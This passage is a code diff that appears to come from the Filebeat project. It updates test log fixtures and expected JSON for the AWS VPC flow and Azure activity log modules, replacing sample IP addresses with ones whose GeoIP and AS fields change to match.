+3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 IPv4 216.160.83.57 10.0.0.62 43416 5001 216.160.83.57 10.0.0.62 6 568 8 1566848875 1566848933 ACCEPT 2 OK
+3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 IPv4 216.160.83.57 10.0.0.62 43638 5001 216.160.83.57 10.0.0.62 6 1260 17 1566933133 1566933193 ACCEPT 3 OK
+3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 IPv4 10.0.0.62 216.160.83.57 5001 43638 10.0.0.62 216.160.83.57 6 967 14 1566933133 1566933193 ACCEPT 19 OK
diff --git a/x-pack/filebeat/module/aws/vpcflow/test/tcp-flag-sequence.log-expected.json b/x-pack/filebeat/module/aws/vpcflow/test/tcp-flag-sequence.log-expected.json
index 46420161eb5f..26243b2065b6 100644
--- a/x-pack/filebeat/module/aws/vpcflow/test/tcp-flag-sequence.log-expected.json
+++ b/x-pack/filebeat/module/aws/vpcflow/test/tcp-flag-sequence.log-expected.json
@@ -7,7 +7,7 @@
 "aws.vpcflow.interface_id": "eni-1235b8ca123456789",
 "aws.vpcflow.log_status": "OK",
 "aws.vpcflow.pkt_dstaddr": "10.0.0.62",
- "aws.vpcflow.pkt_srcaddr": "52.213.180.42",
+ "aws.vpcflow.pkt_srcaddr": "216.160.83.57",
 "aws.vpcflow.subnet_id": "subnet-aaaaaaaa012345678",
 "aws.vpcflow.tcp_flags": "2",
 "aws.vpcflow.tcp_flags_array": [
@@ -27,7 +27,7 @@
 "event.end": "2019-08-26T19:48:53.000Z",
 "event.kind": "event",
 "event.module": "aws",
- "event.original": "3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 IPv4 52.213.180.42 10.0.0.62 43416 5001 52.213.180.42 10.0.0.62 6 568 8 1566848875 1566848933 ACCEPT 2 OK",
+ "event.original": "3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 IPv4 216.160.83.57 10.0.0.62 43416 5001 216.160.83.57 10.0.0.62 6 568 8 1566848875 1566848933 ACCEPT 2 OK",
 "event.outcome": "allow",
 "event.start": "2019-08-26T19:47:55.000Z",
 "event.type": "flow",
@@ -35,29 +35,28 @@
 "input.type": "log",
 "log.offset": 183,
 "network.bytes": 568,
- "network.community_id": "1:HQ1oJYZ+9SJOoeju7badiLfvwls=",
+ "network.community_id": "1:5DIeCY/P+BURA89VEsK87fPS688=",
 "network.iana_number": "6",
 "network.packets": 8,
 "network.transport": "tcp",
 "network.type": "ipv4",
 "related.ip": [
 "10.0.0.62",
- "52.213.180.42"
+ "216.160.83.57"
 ],
 "service.type": "aws",
- "source.address": "52.213.180.42",
- "source.as.number": 16509,
- "source.as.organization.name": "Amazon.com, Inc.",
+ "source.address": "216.160.83.57",
+ "source.as.number": 209,
 "source.bytes": 568,
- "source.geo.city_name": "Dublin",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "IE",
- "source.geo.country_name": "Ireland",
- "source.geo.location.lat": 53.3338,
- "source.geo.location.lon": -6.2488,
- "source.geo.region_iso_code": "IE-L",
- "source.geo.region_name": "Leinster",
- "source.ip": "52.213.180.42",
+ "source.geo.city_name": "Milton",
+ "source.geo.continent_name": "North America",
+ "source.geo.country_iso_code": "US",
+ "source.geo.country_name": "United States",
+ "source.geo.location.lat": 47.2513,
+ "source.geo.location.lon": -122.3149,
+ "source.geo.region_iso_code": "US-WA",
+ "source.geo.region_name": "Washington",
+ "source.ip": "216.160.83.57",
 "source.packets": 8,
 "source.port": 43416,
 "tags": [
@@ -73,7 +72,7 @@
 "aws.vpcflow.interface_id": "eni-1235b8ca123456789",
 "aws.vpcflow.log_status": "OK",
 "aws.vpcflow.pkt_dstaddr": "10.0.0.62",
- "aws.vpcflow.pkt_srcaddr": "52.213.180.42",
+ "aws.vpcflow.pkt_srcaddr": "216.160.83.57",
 "aws.vpcflow.subnet_id": "subnet-aaaaaaaa012345678",
 "aws.vpcflow.tcp_flags": "3",
 "aws.vpcflow.tcp_flags_array": [
@@ -94,7 +93,7 @@
 "event.end": "2019-08-27T19:13:13.000Z",
 "event.kind": "event",
 "event.module": "aws",
- "event.original": "3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 IPv4 52.213.180.42 10.0.0.62 43638 5001 52.213.180.42 10.0.0.62 6 1260 17 1566933133 1566933193 ACCEPT 3 OK",
+ "event.original": "3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 IPv4 216.160.83.57 10.0.0.62 43638 5001 216.160.83.57 10.0.0.62 6 1260 17 1566933133 1566933193 ACCEPT 3 OK",
 "event.outcome": "allow",
 "event.start": "2019-08-27T19:12:13.000Z",
 "event.type": "flow",
@@ -102,29 +101,28 @@
 "input.type": "log",
 "log.offset": 393,
 "network.bytes": 1260,
- "network.community_id": "1:nOrJcppKxIxs557D2oKADkNCpno=",
+ "network.community_id": "1:NKnj38v7hoqC47oCLJ5opK+yqZc=",
 "network.iana_number": "6",
 "network.packets": 17,
 "network.transport": "tcp",
 "network.type": "ipv4",
 "related.ip": [
 "10.0.0.62",
- "52.213.180.42"
+ "216.160.83.57"
 ],
 "service.type": "aws",
- "source.address": "52.213.180.42",
- "source.as.number": 16509,
- "source.as.organization.name": "Amazon.com, Inc.",
+ "source.address": "216.160.83.57",
+ "source.as.number": 209,
 "source.bytes": 1260,
- "source.geo.city_name": "Dublin",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "IE",
- "source.geo.country_name": "Ireland",
- "source.geo.location.lat": 53.3338,
- "source.geo.location.lon": -6.2488,
- "source.geo.region_iso_code": "IE-L",
- "source.geo.region_name": "Leinster",
- "source.ip": "52.213.180.42",
+ "source.geo.city_name": "Milton",
+ "source.geo.continent_name": "North America",
+ "source.geo.country_iso_code": "US",
+ "source.geo.country_name": "United States",
+ "source.geo.location.lat": 47.2513,
+ "source.geo.location.lon": -122.3149,
+ "source.geo.region_iso_code": "US-WA",
+ "source.geo.region_name": "Washington",
+ "source.ip": "216.160.83.57",
 "source.packets": 17,
 "source.port": 43638,
 "tags": [
@@ -139,7 +137,7 @@
 "aws.vpcflow.instance_id": "i-01234567890123456",
 "aws.vpcflow.interface_id": "eni-1235b8ca123456789",
 "aws.vpcflow.log_status": "OK",
- "aws.vpcflow.pkt_dstaddr": "52.213.180.42",
+ "aws.vpcflow.pkt_dstaddr": "216.160.83.57",
 "aws.vpcflow.pkt_srcaddr": "10.0.0.62",
 "aws.vpcflow.subnet_id": "subnet-aaaaaaaa012345678",
 "aws.vpcflow.tcp_flags": "19",
@@ -154,25 +152,24 @@
 "cloud.account.id": "123456789010",
 "cloud.instance.id": "i-01234567890123456",
 "cloud.provider": "aws",
- "destination.address": "52.213.180.42",
- "destination.as.number": 16509,
- "destination.as.organization.name": "Amazon.com, Inc.",
- "destination.geo.city_name": "Dublin",
- "destination.geo.continent_name": "Europe",
- "destination.geo.country_iso_code": "IE",
- "destination.geo.country_name": "Ireland",
- "destination.geo.location.lat": 53.3338,
- "destination.geo.location.lon": -6.2488,
- "destination.geo.region_iso_code": "IE-L",
- "destination.geo.region_name": "Leinster",
- "destination.ip": "52.213.180.42",
+ "destination.address": "216.160.83.57",
+ "destination.as.number": 209,
+ "destination.geo.city_name": "Milton",
+ "destination.geo.continent_name": "North America",
+ "destination.geo.country_iso_code": "US",
+ "destination.geo.country_name": "United States",
+ "destination.geo.location.lat": 47.2513,
+ "destination.geo.location.lon": -122.3149,
+ "destination.geo.region_iso_code": "US-WA",
+ "destination.geo.region_name": "Washington",
+ "destination.ip": "216.160.83.57",
 "destination.port": 43638,
 "event.category": "network_traffic",
 "event.dataset": "aws.vpcflow",
 "event.end": "2019-08-27T19:13:13.000Z",
 "event.kind": "event",
 "event.module": "aws",
- "event.original": "3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 IPv4 10.0.0.62 52.213.180.42 5001 43638 10.0.0.62 52.213.180.42 6 967 14 1566933133 1566933193 ACCEPT 19 OK",
+ "event.original": "3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 IPv4 10.0.0.62 216.160.83.57 5001 43638 10.0.0.62 216.160.83.57 6 967 14 1566933133 1566933193 ACCEPT 19 OK",
 "event.outcome": "allow",
 "event.start": "2019-08-27T19:12:13.000Z",
 "event.type": "flow",
@@ -180,14 +177,14 @@
 "input.type": "log",
 "log.offset": 605,
 "network.bytes": 967,
- "network.community_id": "1:nOrJcppKxIxs557D2oKADkNCpno=",
+ "network.community_id": "1:NKnj38v7hoqC47oCLJ5opK+yqZc=",
 "network.iana_number": "6",
 "network.packets": 14,
 "network.transport": "tcp",
 "network.type": "ipv4",
 "related.ip": [
 "10.0.0.62",
- "52.213.180.42"
+ "216.160.83.57"
 ],
 "service.type": "aws",
 "source.address": "10.0.0.62",
diff --git a/x-pack/filebeat/module/azure/activitylogs/test/activitylogs.log b/x-pack/filebeat/module/azure/activitylogs/test/activitylogs.log
index 4b47c46d236c..acef3e8e9840 100644
--- a/x-pack/filebeat/module/azure/activitylogs/test/activitylogs.log
+++ b/x-pack/filebeat/module/azure/activitylogs/test/activitylogs.log
@@ -1 +1 @@
-{"callerIpAddress":"51.251.141.41","category":"Action","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","durationMs":0,"identity":{"authorization":{"action":"Microsoft.EventHub/namespaces/authorizationRules/listKeys/action","evidence":{"principalId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","principalType":"ServicePrincipal","role":"Azure EventGrid Service BuiltIn Role","roleAssignmentId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","roleAssignmentScope":"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53","roleDefinitionId":"8a4de8b5-095c-47d0-a96f-a75130c61d53"},"scope":"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53/resourceGroups/sa-hem/providers/Microsoft.EventHub/namespaces/azurelsevents/authorizationRules/RootManageSharedAccessKey"},"claims":{"aio":"8a4de8b5-095c-47d0-a96f-a75130c61d53","appid":"8a4de8b5-095c-47d0-a96f-a75130c61d53","appidacr":"2","aud":"https://management.core.windows.net/","exp":"1571904826","http://schemas.microsoft.com/identity/claims/identityprovider":"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/","http://schemas.microsoft.com/identity/claims/objectidentifier":"8a4de8b5-095c-47d0-a96f-a75130c61d53","http://schemas.microsoft.com/identity/claims/tenantid":"8a4de8b5-095c-47d0-a96f-a75130c61d53","http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier":"8a4de8b5-095c-47d0-a96f-a75130c61d53","iat":"1571875726","iss":"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/","nbf":"1571875726","uti":"8a4de8b5-095c-47d0-a96f-a75130c61d53","ver":"1.0"}},"level":"Information","location":"global","operationName":"MICROSOFT.EVENTHUB/NAMESPACES/AUTHORIZATIONRULES/LISTKEYS/ACTION","resourceId":"/SUBSCRIPTIONS/8a4de8b5-095c-47d0-a96f-a75130c61d53/RESOURCEGROUPS/SA-HEMA/PROVIDERS/MICROSOFT.EVENTHUB/NAMESPACES/AZURELSEVENTS/AUTHORIZATIONRULES/ROOTMANAGESHAREDACCESSKEY","resultSignature":"Started.","resultType":"Start","time":"2019-10-24T00:13:46.3554259Z"}
+{"callerIpAddress":"216.160.83.61","category":"Action","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","durationMs":0,"identity":{"authorization":{"action":"Microsoft.EventHub/namespaces/authorizationRules/listKeys/action","evidence":{"principalId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","principalType":"ServicePrincipal","role":"Azure EventGrid Service BuiltIn Role","roleAssignmentId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","roleAssignmentScope":"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53","roleDefinitionId":"8a4de8b5-095c-47d0-a96f-a75130c61d53"},"scope":"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53/resourceGroups/sa-hem/providers/Microsoft.EventHub/namespaces/azurelsevents/authorizationRules/RootManageSharedAccessKey"},"claims":{"aio":"8a4de8b5-095c-47d0-a96f-a75130c61d53","appid":"8a4de8b5-095c-47d0-a96f-a75130c61d53","appidacr":"2","aud":"https://management.core.windows.net/","exp":"1571904826","http://schemas.microsoft.com/identity/claims/identityprovider":"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/","http://schemas.microsoft.com/identity/claims/objectidentifier":"8a4de8b5-095c-47d0-a96f-a75130c61d53","http://schemas.microsoft.com/identity/claims/tenantid":"8a4de8b5-095c-47d0-a96f-a75130c61d53","http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier":"8a4de8b5-095c-47d0-a96f-a75130c61d53","iat":"1571875726","iss":"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/","nbf":"1571875726","uti":"8a4de8b5-095c-47d0-a96f-a75130c61d53","ver":"1.0"}},"level":"Information","location":"global","operationName":"MICROSOFT.EVENTHUB/NAMESPACES/AUTHORIZATIONRULES/LISTKEYS/ACTION","resourceId":"/SUBSCRIPTIONS/8a4de8b5-095c-47d0-a96f-a75130c61d53/RESOURCEGROUPS/SA-HEMA/PROVIDERS/MICROSOFT.EVENTHUB/NAMESPACES/AZURELSEVENTS/AUTHORIZATIONRULES/ROOTMANAGESHAREDACCESSKEY","resultSignature":"Started.","resultType":"Start","time":"2019-10-24T00:13:46.3554259Z"} 
diff --git a/x-pack/filebeat/module/azure/activitylogs/test/activitylogs.log-expected.json b/x-pack/filebeat/module/azure/activitylogs/test/activitylogs.log-expected.json
index 245269fbfb6d..31368dde9e4d 100644
--- a/x-pack/filebeat/module/azure/activitylogs/test/activitylogs.log-expected.json
+++ b/x-pack/filebeat/module/azure/activitylogs/test/activitylogs.log-expected.json
@@ -35,36 +35,43 @@
 "azure.resource.namespace": "AZURELSEVENTS",
 "azure.resource.provider": "MICROSOFT.EVENTHUB",
 "azure.subscription_id": "8a4de8b5-095c-47d0-a96f-a75130c61d53",
- "client.ip": "51.251.141.41",
+ "client.ip": "216.160.83.61",
 "cloud.provider": "azure",
 "event.action": "MICROSOFT.EVENTHUB/NAMESPACES/AUTHORIZATIONRULES/LISTKEYS/ACTION",
 "event.dataset": "azure.activitylogs",
 "event.duration": 0,
 "event.kind": "event",
 "event.module": "azure",
- "event.original": "{\"callerIpAddress\":\"51.251.141.41\",\"category\":\"Action\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":{\"authorization\":{\"action\":\"Microsoft.EventHub/namespaces/authorizationRules/listKeys/action\",\"evidence\":{\"principalId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"principalType\":\"ServicePrincipal\",\"role\":\"Azure EventGrid Service BuiltIn Role\",\"roleAssignmentId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"roleAssignmentScope\":\"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"roleDefinitionId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\"},\"scope\":\"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53/resourceGroups/sa-hem/providers/Microsoft.EventHub/namespaces/azurelsevents/authorizationRules/RootManageSharedAccessKey\"},\"claims\":{\"aio\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"appid\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"appidacr\":\"2\",\"aud\":\"https://management.core.windows.net/\",\"exp\":\"1571904826\",\"http://schemas.microsoft.com/identity/claims/identityprovider\":\"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/\",\"http://schemas.microsoft.com/identity/claims/objectidentifier\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"http://schemas.microsoft.com/identity/claims/tenantid\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"iat\":\"1571875726\",\"iss\":\"https://sts.windows.net/
8a4de8b5-095c-47d0-a96f-a75130c61d53/\",\"nbf\":\"1571875726\",\"uti\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ver\":\"1.0\"}},\"level\":\"Information\",\"location\":\"global\",\"operationName\":\"MICROSOFT.EVENTHUB/NAMESPACES/AUTHORIZATIONRULES/LISTKEYS/ACTION\",\"resourceId\":\"/SUBSCRIPTIONS/8a4de8b5-095c-47d0-a96f-a75130c61d53/RESOURCEGROUPS/SA-HEMA/PROVIDERS/MICROSOFT.EVENTHUB/NAMESPACES/AZURELSEVENTS/AUTHORIZATIONRULES/ROOTMANAGESHAREDACCESSKEY\",\"resultSignature\":\"Started.\",\"resultType\":\"Start\",\"time\":\"2019-10-24T00:13:46.3554259Z\"}",
+ "event.original": "{\"callerIpAddress\":\"216.160.83.61\",\"category\":\"Action\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":{\"authorization\":{\"action\":\"Microsoft.EventHub/namespaces/authorizationRules/listKeys/action\",\"evidence\":{\"principalId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"principalType\":\"ServicePrincipal\",\"role\":\"Azure EventGrid Service BuiltIn Role\",\"roleAssignmentId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"roleAssignmentScope\":\"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"roleDefinitionId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\"},\"scope\":\"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53/resourceGroups/sa-hem/providers/Microsoft.EventHub/namespaces/azurelsevents/authorizationRules/RootManageSharedAccessKey\"},\"claims\":{\"aio\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"appid\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"appidacr\":\"2\",\"aud\":\"https://management.core.windows.net/\",\"exp\":\"1571904826\",\"http://schemas.microsoft.com/identity/claims/identityprovider\":\"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/\",\"http://schemas.microsoft.com/identity/claims/objectidentifier\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"http://schemas.microsoft.com/identity/claims/tenantid\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"iat\":\"1571875726\",\"iss\":\"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/\",\"nbf\":\"1571875726\",\"uti\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ver\":\"1.0\"}},\"level\":\"Information\",\"location\":\"global\",\"operationName\":\"MICROSOFT.EVENTHUB/NAMESPACES/AUTHORIZATIONRULES/LISTKEYS/ACTION\",\"resourceId\":\"/SUBSCRIPTIONS/8a4de8b5-095c-47d0-a96f-a75130c61d53/RESOURCEGROUPS/SA-HEMA/PROVIDERS/MICROSOFT.EVENTHUB/NAMESPACES/AZURELSEVENTS/AUTHORIZATIONRULES/ROOTMANAGESHAREDACCESSKEY\",\"resultSignature\":\"Started.\",\"resultType\":\"Start\",\"time\":\"2019-10-24T00:13:46.3554259Z\"}",
 "event.type": [
 "change"
 ],
 "fileset.name": "activitylogs",
- "geo.continent_name": "Europe",
- "geo.country_iso_code": "GB",
- "geo.country_name": "United Kingdom",
- "geo.location.lat": 51.4964,
- "geo.location.lon": -0.1224,
+ "geo.city_name": "Milton",
+ "geo.continent_name": "North America",
+ "geo.country_iso_code": "US",
+ "geo.country_name": "United States",
+ "geo.location.lat": 47.2513,
+ "geo.location.lon": -122.3149,
+ "geo.region_iso_code": "US-WA",
+ "geo.region_name": "Washington",
 "input.type": "log",
 "log.level": "Information",
 "log.offset": 0,
 "related.ip": [
- "51.251.141.41"
+ "216.160.83.61"
 ],
 "service.type": "azure",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "GB",
- "source.geo.country_name": "United Kingdom",
- "source.geo.location.lat": 51.4964,
- "source.geo.location.lon": -0.1224,
- "source.ip": "51.251.141.41",
+ "source.as.number": 209,
+ "source.geo.city_name": "Milton",
+ "source.geo.continent_name": "North America",
+ "source.geo.country_iso_code": "US",
+ "source.geo.country_name": "United States",
+ "source.geo.location.lat": 47.2513,
+ "source.geo.location.lon": -122.3149,
+ "source.geo.region_iso_code": "US-WA",
+ "source.geo.region_name": "Washington",
+ "source.ip": "216.160.83.61",
 "tags": [
 "forwarded"
 ]
diff --git a/x-pack/filebeat/module/azure/activitylogs/test/supporttickets_write.log b/x-pack/filebeat/module/azure/activitylogs/test/supporttickets_write.log
index d1f15fa5d1d7..0a57f9beda1f 100644
--- a/x-pack/filebeat/module/azure/activitylogs/test/supporttickets_write.log
+++ b/x-pack/filebeat/module/azure/activitylogs/test/supporttickets_write.log
@@ -1 +1 @@
-{"time":"2015-01-21T22:14:26.9792776Z","resourceId":"/subscriptions/s1/resourceGroups/MSSupportGroup/providers/microsoft.support/supporttickets/115012112305841","operationName":"microsoft.support/supporttickets/write","category":"Write","resultType":"Success","resultSignature":"Succeeded.Created","durationMs":2826,"callerIpAddress":"111.111.111.11","correlationId":"c776f9f4-36e5-4e0e-809b-c9b3c3fb62a8","identity":{"authorization":{"scope":"/subscriptions/s1/resourceGroups/MSSupportGroup/providers/microsoft.support/supporttickets/115012112305841","action":"microsoft.support/supporttickets/write","evidence":{"role":"Subscription Admin"}},"claims":{"aud":"https://management.core.windows.net/","iss":"https://sts.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/","iat":"1421876371","nbf":"1421876371","exp":"1421880271","ver":"1.0","http://schemas.microsoft.com/identity/claims/tenantid":"1e8d8218-c5e7-4578-9acc-9abbd5d23315 ","http://schemas.microsoft.com/claims/authnmethodsreferences":"pwd","http://schemas.microsoft.com/identity/claims/objectidentifier":"2468adf0-8211-44e3-95xq-85137af64708","http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn":"admin@contoso.com","puid":"20030000801A118C","http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier":"9vckmEGF7zDKk1YzIY8k0t1_EAPaXoeHyPRn6f413zM","http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname":"John","http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname":"Smith","name":"John Smith","groups":"cacfe77c-e058-4712-83qw-f9b08849fd60,7f71d11d-4c41-4b23-99d2-d32ce7aa621c,31522864-0578-4ea0-9gdc-e66cc564d18c","http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name":" 
admin@contoso.com","appid":"c44b4083-3bq0-49c1-b47d-974e53cbdf3c","appidacr":"2","http://schemas.microsoft.com/identity/claims/scope":"user_impersonation","http://schemas.microsoft.com/claims/authnclassreference":"1"}},"level":"Information","location":"global","properties":{"statusCode":"Created","serviceRequestId":"50d5cddb-8ca0-47ad-9b80-6cde2207f97c"}}
+{"time":"2015-01-21T22:14:26.9792776Z","resourceId":"/subscriptions/s1/resourceGroups/MSSupportGroup/providers/microsoft.support/supporttickets/115012112305841","operationName":"microsoft.support/supporttickets/write","category":"Write","resultType":"Success","resultSignature":"Succeeded.Created","durationMs":2826,"callerIpAddress":"81.2.69.143","correlationId":"c776f9f4-36e5-4e0e-809b-c9b3c3fb62a8","identity":{"authorization":{"scope":"/subscriptions/s1/resourceGroups/MSSupportGroup/providers/microsoft.support/supporttickets/115012112305841","action":"microsoft.support/supporttickets/write","evidence":{"role":"Subscription Admin"}},"claims":{"aud":"https://management.core.windows.net/","iss":"https://sts.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/","iat":"1421876371","nbf":"1421876371","exp":"1421880271","ver":"1.0","http://schemas.microsoft.com/identity/claims/tenantid":"1e8d8218-c5e7-4578-9acc-9abbd5d23315 ","http://schemas.microsoft.com/claims/authnmethodsreferences":"pwd","http://schemas.microsoft.com/identity/claims/objectidentifier":"2468adf0-8211-44e3-95xq-85137af64708","http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn":"admin@contoso.com","puid":"20030000801A118C","http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier":"9vckmEGF7zDKk1YzIY8k0t1_EAPaXoeHyPRn6f413zM","http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname":"John","http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname":"Smith","name":"John 
Smith","groups":"cacfe77c-e058-4712-83qw-f9b08849fd60,7f71d11d-4c41-4b23-99d2-d32ce7aa621c,31522864-0578-4ea0-9gdc-e66cc564d18c","http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name":" admin@contoso.com","appid":"c44b4083-3bq0-49c1-b47d-974e53cbdf3c","appidacr":"2","http://schemas.microsoft.com/identity/claims/scope":"user_impersonation","http://schemas.microsoft.com/claims/authnclassreference":"1"}},"level":"Information","location":"global","properties":{"statusCode":"Created","serviceRequestId":"50d5cddb-8ca0-47ad-9b80-6cde2207f97c"}}
diff --git a/x-pack/filebeat/module/azure/activitylogs/test/supporttickets_write.log-expected.json b/x-pack/filebeat/module/azure/activitylogs/test/supporttickets_write.log-expected.json
index 28c9ca7cd009..46fee87db047 100644
--- a/x-pack/filebeat/module/azure/activitylogs/test/supporttickets_write.log-expected.json
+++ b/x-pack/filebeat/module/azure/activitylogs/test/supporttickets_write.log-expected.json
@@ -39,42 +39,46 @@ "azure.correlation_id": "c776f9f4-36e5-4e0e-809b-c9b3c3fb62a8", "azure.resource.id": "/subscriptions/s1/resourceGroups/MSSupportGroup/providers/microsoft.support/supporttickets/115012112305841", "azure.resource.provider": "microsoft.support/supporttickets/115012112305841", - "client.ip": "111.111.111.11", + "client.ip": "81.2.69.143", "cloud.provider": "azure", "event.action": "microsoft.support/supporttickets/write", "event.dataset": "azure.activitylogs", "event.duration": -1468967296, "event.kind": "event", "event.module": "azure", - "event.original": "{\"time\":\"2015-01-21T22:14:26.9792776Z\",\"resourceId\":\"/subscriptions/s1/resourceGroups/MSSupportGroup/providers/microsoft.support/supporttickets/115012112305841\",\"operationName\":\"microsoft.support/supporttickets/write\",\"category\":\"Write\",\"resultType\":\"Success\",\"resultSignature\":\"Succeeded.Created\",\"durationMs\":2826,\"callerIpAddress\":\"111.111.111.11\",\"correlationId\":\"c776f9f4-36e5-4e0e-809b-c9b3c3fb62a8\",\"identity\":{\"authorization\":{\"scope\":\"/subscriptions/s1/resourceGroups/MSSupportGroup/providers/microsoft.support/supporttickets/115012112305841\",\"action\":\"microsoft.support/supporttickets/write\",\"evidence\":{\"role\":\"Subscription Admin\"}},\"claims\":{\"aud\":\"https://management.core.windows.net/\",\"iss\":\"https://sts.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/\",\"iat\":\"1421876371\",\"nbf\":\"1421876371\",\"exp\":\"1421880271\",\"ver\":\"1.0\",\"http://schemas.microsoft.com/identity/claims/tenantid\":\"1e8d8218-c5e7-4578-9acc-9abbd5d23315 
\",\"http://schemas.microsoft.com/claims/authnmethodsreferences\":\"pwd\",\"http://schemas.microsoft.com/identity/claims/objectidentifier\":\"2468adf0-8211-44e3-95xq-85137af64708\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn\":\"admin@contoso.com\",\"puid\":\"20030000801A118C\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier\":\"9vckmEGF7zDKk1YzIY8k0t1_EAPaXoeHyPRn6f413zM\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname\":\"John\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname\":\"Smith\",\"name\":\"John Smith\",\"groups\":\"cacfe77c-e058-4712-83qw-f9b08849fd60,7f71d11d-4c41-4b23-99d2-d32ce7aa621c,31522864-0578-4ea0-9gdc-e66cc564d18c\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name\":\" admin@contoso.com\",\"appid\":\"c44b4083-3bq0-49c1-b47d-974e53cbdf3c\",\"appidacr\":\"2\",\"http://schemas.microsoft.com/identity/claims/scope\":\"user_impersonation\",\"http://schemas.microsoft.com/claims/authnclassreference\":\"1\"}},\"level\":\"Information\",\"location\":\"global\",\"properties\":{\"statusCode\":\"Created\",\"serviceRequestId\":\"50d5cddb-8ca0-47ad-9b80-6cde2207f97c\"}}", + "event.original": "{\"time\":\"2015-01-21T22:14:26.9792776Z\",\"resourceId\":\"/subscriptions/s1/resourceGroups/MSSupportGroup/providers/microsoft.support/supporttickets/115012112305841\",\"operationName\":\"microsoft.support/supporttickets/write\",\"category\":\"Write\",\"resultType\":\"Success\",\"resultSignature\":\"Succeeded.Created\",\"durationMs\":2826,\"callerIpAddress\":\"81.2.69.143\",\"correlationId\":\"c776f9f4-36e5-4e0e-809b-c9b3c3fb62a8\",\"identity\":{\"authorization\":{\"scope\":\"/subscriptions/s1/resourceGroups/MSSupportGroup/providers/microsoft.support/supporttickets/115012112305841\",\"action\":\"microsoft.support/supporttickets/write\",\"evidence\":{\"role\":\"Subscription 
